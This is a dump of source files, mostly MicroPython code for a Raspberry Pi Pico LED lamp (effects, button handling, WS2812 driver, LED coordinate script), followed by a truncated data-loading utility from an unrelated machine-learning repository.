            command = self.button.fetchCommand()
            if command != ButtonCommand.NONE:
                self.ledStrip.clear()
                return command
            self.loop()
            time.sleep_ms(self.loopInterval)
        return ButtonCommand.NONE
|
{"/mc-code/effects/lambdaColor.py": ["/mc-code/effects/baseEffect.py"], "/mc-code/effects/__init__.py": ["/mc-code/effects/biColor.py", "/mc-code/effects/rainbowStars.py", "/mc-code/effects/wipePlane.py", "/mc-code/effects/proximaPlane.py"], "/mc-code/effects/rainbowStars.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/baseSweepingEffect.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/biColor.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/wipePlane.py": ["/mc-code/effects/baseSweepingEffect.py"], "/mc-code/effects/proximaPlane.py": ["/mc-code/effects/baseSweepingEffect.py"]}
|
34,412
|
krismsd/rpipico-led-lamp
|
refs/heads/master
|
/mc-code/effects/lambdaColor.py
|
from .baseEffect import BaseEffect
from button import Button
from color import Color
from leds import LedStripControl, NUM_LEDS
from utils import blendChannel, bound
import time
import random
# Enum-like phases of a single LED's animation cycle.
class AnimationState:
    WAITING = 0  # holding a steady color until the scheduled start time
    ANIMATING = 1  # cross-fading from the current color to the target color
class LambdaColor(BaseEffect):
    """Effect where every LED independently waits a random time, then
    cross-fades to a new color produced by the injected colorGetter."""

    # colorGetter: function
    animationDuration: int
    waitLow: int
    waitHigh: int

    def __init__(self, ledStrip: LedStripControl, button: Button, colorGetter, animationDuration: int, waitLow: int, waitHigh: int) -> None:
        super().__init__(ledStrip, button)
        self.colorGetter = colorGetter  # callable(previous_color) -> next_color
        self.animationDuration = animationDuration  # fade length in ms
        self.waitLow = waitLow  # min wait between fades, ms
        self.waitHigh = waitHigh  # max wait between fades, ms
        self.ledState = []

    def setup(self):
        # Fixed: rebuild the state list from scratch. Effects are reused
        # across runs (main.py cycles the same instances), and the original
        # append-only setup grew ledState by NUM_LEDS stale entries per run.
        self.ledState = []
        for i in range(NUM_LEDS):
            # Entry layout: [state, deadline_ms, current_color, target_color]
            self.ledState.append([
                AnimationState.WAITING,
                time.ticks_ms() + random.randint(500, 5000),
                self.colorGetter(Color.BLACK),
                Color.BLACK,
            ])

    def loop(self):
        now = time.ticks_ms()
        for i in range(NUM_LEDS):
            led = self.ledState[i]
            if led[0] == AnimationState.WAITING and led[1] < now:
                # Wait elapsed: begin fading towards a freshly chosen color.
                led[0] = AnimationState.ANIMATING
                led[1] = now + self.animationDuration  # fade deadline
                led[3] = self.colorGetter(led[2])
            if led[0] == AnimationState.ANIMATING:
                if led[1] < now:
                    # Fade finished: commit the target and schedule the next wait.
                    led[0] = AnimationState.WAITING
                    led[1] = now + random.randint(self.waitLow, self.waitHigh)
                    led[2] = led[3]
                    led[3] = Color.BLACK
            if led[0] == AnimationState.WAITING:
                self.ledStrip.setLed(i, led[2])
            elif led[0] == AnimationState.ANIMATING:
                transitionPercent = 1 - bound((led[1] - now) / self.animationDuration, 0, 1)
                color = [blendChannel(led[2][j], led[3][j], transitionPercent) for j in range(3)]
                self.ledStrip.setLed(i, color)
        self.ledStrip.refresh()
        # NOTE(review): adds to the base class's loopInterval sleep -- confirm
        # the extra 10 ms per frame is intentional.
        time.sleep_ms(10)
|
{"/mc-code/effects/lambdaColor.py": ["/mc-code/effects/baseEffect.py"], "/mc-code/effects/__init__.py": ["/mc-code/effects/biColor.py", "/mc-code/effects/rainbowStars.py", "/mc-code/effects/wipePlane.py", "/mc-code/effects/proximaPlane.py"], "/mc-code/effects/rainbowStars.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/baseSweepingEffect.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/biColor.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/wipePlane.py": ["/mc-code/effects/baseSweepingEffect.py"], "/mc-code/effects/proximaPlane.py": ["/mc-code/effects/baseSweepingEffect.py"]}
|
34,413
|
krismsd/rpipico-led-lamp
|
refs/heads/master
|
/mc-code/main.py
|
import time
from leds import LedStripControl
from button import ButtonCommand, Button
from color import Color
import effects
LEDSTRIP_DATA_PIN = 28  # GPIO driving the WS2812 data line
BUTTON_PIN = 27  # GPIO wired to the control button

ledStrip = LedStripControl(LEDSTRIP_DATA_PIN)
button = Button(BUTTON_PIN)

# Effects cycled in order by loopEffects(); each instance is reused across cycles.
effectFns: list = [
    effects.ProximaPlane(ledStrip, button),
    effects.WipePlane(ledStrip, button),
    effects.BiColor(ledStrip, button, Color.PURPLE, Color.CYAN),
    effects.BiColor(ledStrip, button, Color.GREEN, Color.PURPLE),
    effects.BiColor(ledStrip, button, Color.WHITE, Color.GREEN),
    effects.RainbowStars(ledStrip, button),
]
def loopEffects():
    """Cycle through every effect in order, forever, until one of them
    returns the OFF command."""
    while True:
        for effect in effectFns:
            if effect.run() == ButtonCommand.OFF:
                return
def waitForButton():
    """Block (polling every 200 ms) until the button issues a NEXT command."""
    print("BEGIN: wait for button")
    while button.fetchCommand() != ButtonCommand.NEXT:
        time.sleep_ms(200)
# Main lifecycle: run effects until the OFF command, then idle until NEXT.
while True:
    loopEffects()
    waitForButton()
|
{"/mc-code/effects/lambdaColor.py": ["/mc-code/effects/baseEffect.py"], "/mc-code/effects/__init__.py": ["/mc-code/effects/biColor.py", "/mc-code/effects/rainbowStars.py", "/mc-code/effects/wipePlane.py", "/mc-code/effects/proximaPlane.py"], "/mc-code/effects/rainbowStars.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/baseSweepingEffect.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/biColor.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/wipePlane.py": ["/mc-code/effects/baseSweepingEffect.py"], "/mc-code/effects/proximaPlane.py": ["/mc-code/effects/baseSweepingEffect.py"]}
|
34,414
|
krismsd/rpipico-led-lamp
|
refs/heads/master
|
/mc-code/color.py
|
class Color:
    """RGB color constants as (r, g, b) tuples with 0-255 channels."""
    BLACK = (0, 0, 0)
    RED = (255, 0, 0)
    YELLOW = (255, 150, 0)
    GREEN = (0, 255, 0)
    CYAN = (0, 255, 255)
    BLUE = (0, 0, 255)
    PURPLE = (180, 0, 255)
    WHITE = (255, 255, 255)
    # All visible colors (black excluded); used for random color picks.
    ALL = (RED, YELLOW, GREEN, CYAN, BLUE, PURPLE, WHITE)
|
{"/mc-code/effects/lambdaColor.py": ["/mc-code/effects/baseEffect.py"], "/mc-code/effects/__init__.py": ["/mc-code/effects/biColor.py", "/mc-code/effects/rainbowStars.py", "/mc-code/effects/wipePlane.py", "/mc-code/effects/proximaPlane.py"], "/mc-code/effects/rainbowStars.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/baseSweepingEffect.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/biColor.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/wipePlane.py": ["/mc-code/effects/baseSweepingEffect.py"], "/mc-code/effects/proximaPlane.py": ["/mc-code/effects/baseSweepingEffect.py"]}
|
34,415
|
krismsd/rpipico-led-lamp
|
refs/heads/master
|
/mc-code/button.py
|
import time
from machine import Pin, Timer
class ButtonCommand:
    """Enum-like command codes produced by Button.fetchCommand()."""
    NONE = 0  # no pending command
    NEXT = 1  # short press: advance to the next effect
    OFF = 2  # press held >= 500 ms: switch the lamp off
class Button:
    """Debounced push button on a pull-down GPIO.

    Edge IRQs feed two one-shot timers: __checkTimer re-reads the pin after
    100 ms to reject glitch presses, and __holdTimer converts a >= 500 ms
    hold into an OFF command. Short presses become NEXT on release.
    Consumers poll fetchCommand().
    """

    __btn: Pin  # input pin, pull-down (reads 1 while pressed)
    __riseStart: int  # tick timestamp of the last accepted press
    __isDown: bool  # True between an accepted press and its release
    __command: int  # pending ButtonCommand, consumed by fetchCommand()
    __checkTimer: Timer  # one-shot glitch filter
    __holdTimer: Timer  # one-shot long-press detector

    def __init__(self, pin: int) -> None:
        self.__btn = Pin(pin, Pin.IN, Pin.PULL_DOWN)
        # Fire on both edges; dispatch in buttonCallback by pin level.
        self.__btn.irq(trigger=Pin.IRQ_FALLING | Pin.IRQ_RISING, handler=self.buttonCallback)
        self.__riseStart = 0
        self.__isDown = False
        self.__command = ButtonCommand.NONE
        self.__checkTimer = Timer()
        self.__holdTimer = Timer()

    def buttonRising(self) -> None:
        """Press edge: debounce, then arm the glitch-check and hold timers."""
        t = time.ticks_ms()
        # NOTE(review): raw tick subtraction; time.ticks_diff() would be
        # wraparound-safe on MicroPython -- confirm.
        if t - self.__riseStart < 400:
            # Ignore presses within 400 ms of the previous one (debounce).
            return
        self.__riseStart = t
        self.__isDown = True
        self.__checkTimer.deinit()
        self.__checkTimer.init(period=100, mode=Timer.ONE_SHOT, callback=self.checkTimerCallback)
        self.__holdTimer.deinit()
        self.__holdTimer.init(period=500, mode=Timer.ONE_SHOT, callback=self.holdTimerCallback)

    def buttonFalling(self) -> None:
        """Release edge: register NEXT for a valid short press."""
        if not self.__isDown:
            # Release without an accepted press (e.g. hold already consumed it).
            return
        t = time.ticks_ms()
        msSinceRise = t - self.__riseStart
        if msSinceRise < 40:
            return # Assume pin is still bouncing
        # elif msSinceRise > 500:
        #     print("registering button up (long)")
        #     self.__command = ButtonCommand.OFF
        else:
            print("button up, registering next command")
            self.__command = ButtonCommand.NEXT
        self.__holdTimer.deinit()
        self.__isDown = False

    def buttonCallback(self, p) -> None:
        # IRQ entry point: route by current pin level.
        if p.value():
            self.buttonRising()
        else:
            self.buttonFalling()

    def checkTimerCallback(self, timer) -> None:
        # 100 ms after a press: if the pin is no longer high, it was a glitch.
        if not self.__btn.value():
            print("check timer check failed, ignoring button down")
            self.__holdTimer.deinit()
            self.__isDown = False

    def holdTimerCallback(self, timer) -> None:
        # Button held for 500 ms: long press -> OFF.
        print("timer elapsed, registering off command")
        self.__command = ButtonCommand.OFF
        self.__isDown = False

    # Get the current command and reset it to none
    def fetchCommand(self) -> int:
        cmd = self.__command
        self.__command = ButtonCommand.NONE
        return cmd
|
{"/mc-code/effects/lambdaColor.py": ["/mc-code/effects/baseEffect.py"], "/mc-code/effects/__init__.py": ["/mc-code/effects/biColor.py", "/mc-code/effects/rainbowStars.py", "/mc-code/effects/wipePlane.py", "/mc-code/effects/proximaPlane.py"], "/mc-code/effects/rainbowStars.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/baseSweepingEffect.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/biColor.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/wipePlane.py": ["/mc-code/effects/baseSweepingEffect.py"], "/mc-code/effects/proximaPlane.py": ["/mc-code/effects/baseSweepingEffect.py"]}
|
34,416
|
krismsd/rpipico-led-lamp
|
refs/heads/master
|
/mc-code/effects/__init__.py
|
from .biColor import BiColor
from .rainbowStars import RainbowStars
from .wipePlane import WipePlane
from .proximaPlane import ProximaPlane
|
{"/mc-code/effects/lambdaColor.py": ["/mc-code/effects/baseEffect.py"], "/mc-code/effects/__init__.py": ["/mc-code/effects/biColor.py", "/mc-code/effects/rainbowStars.py", "/mc-code/effects/wipePlane.py", "/mc-code/effects/proximaPlane.py"], "/mc-code/effects/rainbowStars.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/baseSweepingEffect.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/biColor.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/wipePlane.py": ["/mc-code/effects/baseSweepingEffect.py"], "/mc-code/effects/proximaPlane.py": ["/mc-code/effects/baseSweepingEffect.py"]}
|
34,417
|
krismsd/rpipico-led-lamp
|
refs/heads/master
|
/mc-code/effects/rainbowStars.py
|
from .lambdaColor import LambdaColor
from leds import LedStripControl
from button import Button
from utils import getNewRandomColor
class RainbowStars(LambdaColor):
def __init__(self, ledStrip: LedStripControl, button: Button) -> None:
def colorGetter(prev):
return getNewRandomColor(prev)
super().__init__(ledStrip, button, colorGetter, 4000, 500, 2000)
|
{"/mc-code/effects/lambdaColor.py": ["/mc-code/effects/baseEffect.py"], "/mc-code/effects/__init__.py": ["/mc-code/effects/biColor.py", "/mc-code/effects/rainbowStars.py", "/mc-code/effects/wipePlane.py", "/mc-code/effects/proximaPlane.py"], "/mc-code/effects/rainbowStars.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/baseSweepingEffect.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/biColor.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/wipePlane.py": ["/mc-code/effects/baseSweepingEffect.py"], "/mc-code/effects/proximaPlane.py": ["/mc-code/effects/baseSweepingEffect.py"]}
|
34,418
|
krismsd/rpipico-led-lamp
|
refs/heads/master
|
/mc-code/leds.py
|
import array
from machine import Pin
import rp2
# (x, y, z) position of each LED on the lamp, in model units -- presumably
# the values printed by /light-coords.py (their ranges match the RANGE_*
# constants below); verify against that script.
LED_POSITIONS = ((-109, -53, -30), (-5, -53, -30), (-65, 37, 74), (-109, -67, 74), (99, 37, 74), (55, -67, 0), (-109, 37, -74), (-35, -7, -74), (69, -7, -74), (-109, 23, -30), (-35, -17, -30), (69, -17, -30), (109, 23, -30), (35, 67, 0))
NUM_LEDS = len(LED_POSITIONS)
# Bounding ranges of the LED positions per axis, used by sweeping effects.
RANGE_X = (-109, 109)
RANGE_Y = (-67, 67)
RANGE_Z = (-74, 74)
AXIS_RANGES = (RANGE_X, RANGE_Y, RANGE_Z)
class LedStripControl:
    """WS2812 ("NeoPixel") strip driver using an RP2040 PIO state machine.

    Colors are staged in `ar` via setLed() and pushed out by refresh().
    """

    sm: rp2.StateMachine
    # NOTE(review): `ar` and `globalBrightness` are CLASS attributes, shared
    # by all instances -- fine for a single strip, but confirm if more than
    # one LedStripControl is ever created.
    ar = array.array("I", [0 for _ in range(NUM_LEDS)])
    globalBrightness: int = 1

    def __init__(self, dataPinNum) -> None:
        # WS2812 PIO program: shifts out 24 bits per LED, encoding each bit
        # as a high/low pulse pair whose widths are set by T1/T2/T3 cycles.
        @rp2.asm_pio(sideset_init=rp2.PIO.OUT_LOW, out_shiftdir=rp2.PIO.SHIFT_LEFT, autopull=True, pull_thresh=24)
        def ws2812():
            T1 = 2
            T2 = 5
            T3 = 3
            wrap_target()
            label("bitloop")
            out(x, 1) .side(0) [T3 - 1]
            jmp(not_x, "do_zero") .side(1) [T1 - 1]
            jmp("bitloop") .side(1) [T2 - 1]
            label("do_zero")
            nop() .side(0) [T2 - 1]
            wrap()
        # Create the StateMachine with the ws2812 program, outputting on pin
        self.sm = rp2.StateMachine(0, ws2812, freq=8_000_000, sideset_base=Pin(dataPinNum))
        self.sm.active(1)

    def refresh(self):
        """Push the staged colors to the strip, applying globalBrightness."""
        dimmer_ar = array.array("I", [0 for _ in range(NUM_LEDS)])
        for i,c in enumerate(self.ar):
            # Stored layout (see setLed) is g<<16 | r<<8 | b; scale each
            # channel, then re-pack in the same GRB order.
            r = int(((c >> 8) & 0xFF) * self.globalBrightness)
            g = int(((c >> 16) & 0xFF) * self.globalBrightness)
            b = int((c & 0xFF) * self.globalBrightness)
            dimmer_ar[i] = (g<<16) + (r<<8) + b
        # Shift left by 8 so the 24 color bits sit in the MSBs for the PIO.
        self.sm.put(dimmer_ar, 8)
        #time.sleep_ms(10)

    def setLed(self, i, color):
        """Stage (r, g, b) *color* for LED *i*; takes effect on refresh()."""
        self.ar[i] = (color[1]<<16) + (color[0]<<8) + color[2]

    def clear(self):
        """Turn every LED off immediately."""
        for i in range(NUM_LEDS):
            self.setLed(i, (0, 0, 0))
        self.refresh()
|
{"/mc-code/effects/lambdaColor.py": ["/mc-code/effects/baseEffect.py"], "/mc-code/effects/__init__.py": ["/mc-code/effects/biColor.py", "/mc-code/effects/rainbowStars.py", "/mc-code/effects/wipePlane.py", "/mc-code/effects/proximaPlane.py"], "/mc-code/effects/rainbowStars.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/baseSweepingEffect.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/biColor.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/wipePlane.py": ["/mc-code/effects/baseSweepingEffect.py"], "/mc-code/effects/proximaPlane.py": ["/mc-code/effects/baseSweepingEffect.py"]}
|
34,419
|
krismsd/rpipico-led-lamp
|
refs/heads/master
|
/light-coords.py
|
### Script for calculating end positions of LED tree given sequence of joined parts and known lengths of parts
# Direction / segment-type tokens used to describe how tube parts are joined.
LEFT = "left"
RIGHT = "right"
UP = "up"
DOWN = "down"
IN = "in"
OUT = "out"
STRAIGHT = "straight"
LONGSTRAIGHT = "longstraight"


class v:
    """A position + facing along the tube tree; `+` appends a part.

    Adding STRAIGHT/LONGSTRAIGHT extends along the current facing; adding a
    direction token appends an elbow that turns towards it. Instances are
    immutable -- `+` returns a new v.
    """

    # Part lengths, in model units.
    turnHalf = 13  # half the path length of an elbow
    straight = 40
    longstraight = 80
    connect = 4  # connector sleeve between consecutive parts

    facingMap = { # Index of dimension (x, y, z) and direction in dimension
        RIGHT: (0, 1),
        LEFT: (0, -1),
        UP: (1, 1),
        DOWN: (1, -1),
        IN: (2, 1),
        OUT: (2, -1),
    }

    def __init__(self, x, y, z, facing):
        self.x = x
        self.y = y
        self.z = z
        self.facing = facing

    # Parameter renamed from `dir` (shadowed the builtin); `+` passes it
    # positionally, so callers are unaffected.
    def __add__(self, direction):
        plot = [self.x, self.y, self.z]
        currentFacingData = self.facingMap[self.facing]
        # Add connector length
        plot[currentFacingData[0]] += self.connect * currentFacingData[1]
        if direction == STRAIGHT or direction == LONGSTRAIGHT:
            # Add in direction of current facing
            plot[currentFacingData[0]] += (self.straight if direction == STRAIGHT else self.longstraight) * currentFacingData[1]
            direction = self.facing
        else:
            # We're turning so add half turn in current facing, then another half turn in new facing
            newFacingData = self.facingMap[direction]
            plot[currentFacingData[0]] += self.turnHalf * currentFacingData[1]
            plot[newFacingData[0]] += self.turnHalf * newFacingData[1]
        return v(
            *plot,
            direction,
        )

    def __repr__(self):
        return "(%s, %s, %s, %s)" % (self.x, self.y, self.z, self.facing)

    def endpoint(self):
        """Return this node's (x, y, z) coordinates as a tuple."""
        return (self.x, self.y, self.z)
t0 = v(-5, -111, 0, UP) # Root coordinate adjusted so all LEDs are centered around 0,0,0
# Tube tree: tA..tE are junctions up the trunk; second-level names (tAA, tBA,
# ...) are branch points hanging off them.
tA = t0 + LONGSTRAIGHT
tAA = tA + LEFT + STRAIGHT + OUT + DOWN
tB = tA + UP
tBA = tB + IN + STRAIGHT
tBAA = tBA + LEFT
tBAB = tBA + RIGHT
tC = tB + UP
tCA = tC + OUT + STRAIGHT
tD = tC + UP
tDA = tD + OUT
tDAA = tDA + LEFT
tE = tD + UP
tEA = tE + RIGHT + LONGSTRAIGHT + DOWN
# One entry per LED: the end position of each terminal branch run.
leds = (
    tAA + LEFT + DOWN,
    tAA + RIGHT + STRAIGHT + DOWN,
    tBAA + UP + LEFT + DOWN,
    tBAA + DOWN + STRAIGHT + LEFT + STRAIGHT + DOWN,
    tBAB + UP + RIGHT + STRAIGHT + DOWN,
    tBAB + DOWN + STRAIGHT + RIGHT + OUT + STRAIGHT + DOWN,
    tCA + LEFT + LEFT + STRAIGHT + DOWN,
    tCA + LEFT + DOWN + STRAIGHT,
    tCA + RIGHT + STRAIGHT + DOWN + STRAIGHT,
    tDAA + LEFT + STRAIGHT + DOWN + STRAIGHT,
    tDAA + DOWN + LONGSTRAIGHT,
    tDA + RIGHT + STRAIGHT + DOWN + LONGSTRAIGHT,
    tEA + OUT + DOWN + STRAIGHT,
    tEA + LEFT + STRAIGHT + DOWN,
)
# Emit the coordinate tuples (pasted into mc-code/leds.py) and the per-axis
# extents (the RANGE_* constants there).
print(list(map(lambda led: led.endpoint(), leds)))
lsX = list(map(lambda led: led.x, leds))
lsY = list(map(lambda led: led.y, leds))
lsZ = list(map(lambda led: led.z, leds))
print ("x range: " + str((min(lsX), max(lsX))))
print ("y range: " + str((min(lsY), max(lsY))))
print ("z range: " + str((min(lsZ), max(lsZ))))
|
{"/mc-code/effects/lambdaColor.py": ["/mc-code/effects/baseEffect.py"], "/mc-code/effects/__init__.py": ["/mc-code/effects/biColor.py", "/mc-code/effects/rainbowStars.py", "/mc-code/effects/wipePlane.py", "/mc-code/effects/proximaPlane.py"], "/mc-code/effects/rainbowStars.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/baseSweepingEffect.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/biColor.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/wipePlane.py": ["/mc-code/effects/baseSweepingEffect.py"], "/mc-code/effects/proximaPlane.py": ["/mc-code/effects/baseSweepingEffect.py"]}
|
34,420
|
krismsd/rpipico-led-lamp
|
refs/heads/master
|
/mc-code/effects/baseSweepingEffect.py
|
import time
from .lambdaColor import BaseEffect
from leds import AXIS_RANGES, LedStripControl
from button import Button
from color import Color
from utils import getNewRandomColor
class BaseSweepingEffect(BaseEffect):
    """Base for effects that sweep a plane back and forth along each axis;
    subclasses render frames in animateFrame()."""

    ANIMATION_DURATION = 4000  # ms per sweep

    # animationGenerator: Generator
    # animation: tuple | None
    animationStart: int  # tick timestamp when the current sweep began

    def __init__(self, ledStrip: LedStripControl, button: Button) -> None:
        super().__init__(ledStrip, button)

    def setup(self):
        self.animationGenerator = wipingAnimationGenerator()
        self.animation = None
        self.animationStart = 0

    def loop(self):
        now = time.ticks_ms()
        animationProgress = (now - self.animationStart) / self.ANIMATION_DURATION
        if animationProgress > 1 or self.animation is None:
            # Current sweep finished (or first frame): pull the next one.
            self.animation = next(self.animationGenerator)
            self.animationStart = time.ticks_ms()
            animationProgress = 0
        (axis, isForwards, colors) = self.animation
        if not isForwards:
            animationProgress = 1 - animationProgress
        # Renamed from `min`/`max`, which shadowed the builtins.
        (axisMin, axisMax) = AXIS_RANGES[axis]
        # Overshoot past both ends so the wipe starts/finishes fully off-lamp.
        padding = 100
        low = axisMin - padding
        high = axisMax + padding
        position = int((high - low) * animationProgress) + low
        self.animateFrame(position, axis, colors, isForwards)

    def animateFrame(self, position, axis, colors, isForwards):
        """Hook: render one frame with the sweep plane at *position* on *axis*."""
        pass
def wipingAnimationGenerator():
    """Yield (axis, isForwards, (color, bgColor)) sweep descriptions forever.

    Loops over every axis in both directions; each sweep gets a fresh random
    color, and the previous sweep's color becomes the new background.
    """
    previous = Color.BLACK
    while True:
        for axis in range(len(AXIS_RANGES)):
            for forwards in (True, False):
                fresh = getNewRandomColor(previous)
                yield (axis, forwards, (fresh, previous))
                previous = fresh
|
{"/mc-code/effects/lambdaColor.py": ["/mc-code/effects/baseEffect.py"], "/mc-code/effects/__init__.py": ["/mc-code/effects/biColor.py", "/mc-code/effects/rainbowStars.py", "/mc-code/effects/wipePlane.py", "/mc-code/effects/proximaPlane.py"], "/mc-code/effects/rainbowStars.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/baseSweepingEffect.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/biColor.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/wipePlane.py": ["/mc-code/effects/baseSweepingEffect.py"], "/mc-code/effects/proximaPlane.py": ["/mc-code/effects/baseSweepingEffect.py"]}
|
34,421
|
krismsd/rpipico-led-lamp
|
refs/heads/master
|
/mc-code/effects/biColor.py
|
import random
from .lambdaColor import LambdaColor
from leds import LedStripControl
from button import Button
from color import Color
class BiColor(LambdaColor):
    """Effect where every LED flips back and forth between two fixed colors."""

    def __init__(self, ledStrip: LedStripControl, button: Button, color1, color2) -> None:
        def colorGetter(prev):
            # From the initial black state pick either color with a coin flip
            # (bit 1 -> color1, matching the original mapping); afterwards
            # always switch to the other color.
            if prev == Color.BLACK:
                return (color2, color1)[random.getrandbits(1)]
            return color2 if prev == color1 else color1
        super().__init__(ledStrip, button, colorGetter, 1000, 500, 1000)
|
{"/mc-code/effects/lambdaColor.py": ["/mc-code/effects/baseEffect.py"], "/mc-code/effects/__init__.py": ["/mc-code/effects/biColor.py", "/mc-code/effects/rainbowStars.py", "/mc-code/effects/wipePlane.py", "/mc-code/effects/proximaPlane.py"], "/mc-code/effects/rainbowStars.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/baseSweepingEffect.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/biColor.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/wipePlane.py": ["/mc-code/effects/baseSweepingEffect.py"], "/mc-code/effects/proximaPlane.py": ["/mc-code/effects/baseSweepingEffect.py"]}
|
34,422
|
krismsd/rpipico-led-lamp
|
refs/heads/master
|
/mc-code/effects/wipePlane.py
|
from .baseSweepingEffect import BaseSweepingEffect
from leds import LED_POSITIONS, NUM_LEDS
from utils import bound, blendChannel
class WipePlane(BaseSweepingEffect):
    """Wipes a new color across the lamp, blending into the previous color
    around the moving plane."""

    def animateFrame(self, position, axis, colors, isForwards):
        (color, bgColor) = colors
        # Width of the blend zone; kept below the sweep padding so the
        # transition completes before the animation moves on.
        scaling = 50
        for idx, led in enumerate(LED_POSITIONS):
            distance = led[axis] - position
            alpha = bound(distance, 0, scaling) / scaling
            if not isForwards:
                alpha = 1 - alpha
            blended = tuple(blendChannel(color[c], bgColor[c], alpha) for c in range(3))
            self.ledStrip.setLed(idx, blended)
        self.ledStrip.refresh()
|
{"/mc-code/effects/lambdaColor.py": ["/mc-code/effects/baseEffect.py"], "/mc-code/effects/__init__.py": ["/mc-code/effects/biColor.py", "/mc-code/effects/rainbowStars.py", "/mc-code/effects/wipePlane.py", "/mc-code/effects/proximaPlane.py"], "/mc-code/effects/rainbowStars.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/baseSweepingEffect.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/biColor.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/wipePlane.py": ["/mc-code/effects/baseSweepingEffect.py"], "/mc-code/effects/proximaPlane.py": ["/mc-code/effects/baseSweepingEffect.py"]}
|
34,423
|
krismsd/rpipico-led-lamp
|
refs/heads/master
|
/mc-code/effects/proximaPlane.py
|
from .baseSweepingEffect import BaseSweepingEffect
from leds import LED_POSITIONS, NUM_LEDS
from utils import bound
class ProximaPlane(BaseSweepingEffect):
def animateFrame(self, position, axis, colors, isForwards):
color = colors[0]
for i in range(NUM_LEDS):
led = LED_POSITIONS[i]
distance = abs(position - led[axis]) * 3
scaling = (255 - bound(distance, 0, 255)) / 255
finalColor = (int(color[0] * scaling), int(color[1] * scaling), int(color[2] * scaling))
self.ledStrip.setLed(i, finalColor)
self.ledStrip.refresh()
|
{"/mc-code/effects/lambdaColor.py": ["/mc-code/effects/baseEffect.py"], "/mc-code/effects/__init__.py": ["/mc-code/effects/biColor.py", "/mc-code/effects/rainbowStars.py", "/mc-code/effects/wipePlane.py", "/mc-code/effects/proximaPlane.py"], "/mc-code/effects/rainbowStars.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/baseSweepingEffect.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/biColor.py": ["/mc-code/effects/lambdaColor.py"], "/mc-code/effects/wipePlane.py": ["/mc-code/effects/baseSweepingEffect.py"], "/mc-code/effects/proximaPlane.py": ["/mc-code/effects/baseSweepingEffect.py"]}
|
34,427
|
NazarNintendo/ml-deepnetwork
|
refs/heads/master
|
/utils/datagen.py
|
from utils.models import Element
import numpy as np
import random
train_test_proportion = .80
def generate_random_data(size) -> tuple[np.ndarray, np.ndarray, np.ndarray, np.ndarray]:
    """
    Randomly generates linearly-separable data, writes it to a file and returns it as numpy arrays.

    :param size: amount of elements in data
    :type size: int
    :return: training and testing sets for X and Y_hat
    """
    data = [Element() for _ in range(size)]
    # The context manager closes the file; the original explicit f.close()
    # was redundant.
    with open('data/data.txt', 'w') as f:
        for element in data:
            f.write(str(element))
    return split_data(data)
def read_from_file(path) -> tuple[np.ndarray, np.ndarray, np.ndarray, np.ndarray]:
    """
    Reads from file and parses data as numpy arrays.
    :param path: the path to a file
    :type path: str
    :return: the numpy arrays of x and y_hat (train/test split via split_data)
    """
    data = []
    i = -1  # keeps the error message meaningful even if the loop never runs
    try:
        with open(path, 'r') as f:
            for i, line in enumerate(f):
                # Split once per line instead of three times.
                fields = line.split(',')
                data.append(Element(fields[0], fields[1], fields[2]))
    except IndexError:
        print(f'Error when reading from {path} - invalid syntax in line {i + 1}')
        exit(1)
    # No explicit f.close(): the `with` block already closed the file.
    return split_data(data)
def split_data(data) -> tuple[np.ndarray, np.ndarray, np.ndarray, np.ndarray]:
    """
    Parses data into X and Y_hat and splits to train and test sets.
    :param data: data
    :type data: list[Element]
    :return: training and testing sets for X and Y_hat
    """
    random.shuffle(data)
    coords = [(float(item.x), float(item.y)) for item in data]
    labels = [int(item.value) for item in data]
    # Index separating the training portion from the testing portion.
    coord_cut = int((len(coords) + 1) * train_test_proportion)
    label_cut = int((len(labels) + 1) * train_test_proportion)
    train_x, test_x = coords[:coord_cut], coords[coord_cut:]
    train_y, test_y = labels[:label_cut], labels[label_cut:]
    return np.array(train_x).T, np.array(test_x).T, np.array(train_y), np.array(test_y)
def read_for_prediction(path) -> np.ndarray:
    """
    Reads from file and parses data as a numpy array.
    :param path: the path to a file
    :type path: str
    :return: the numpy array of x
    """
    elements = []
    try:
        with open(path, 'r') as f:
            for i, line in enumerate(f):
                fields = line.split(',')
                # The label is unknown at prediction time; use the placeholder '0'.
                elements.append(Element(fields[0], fields[1], '0'))
    except IndexError:
        print(f'Error when reading from {path} - invalid syntax in line {i + 1}')
        exit(1)
    f.close()
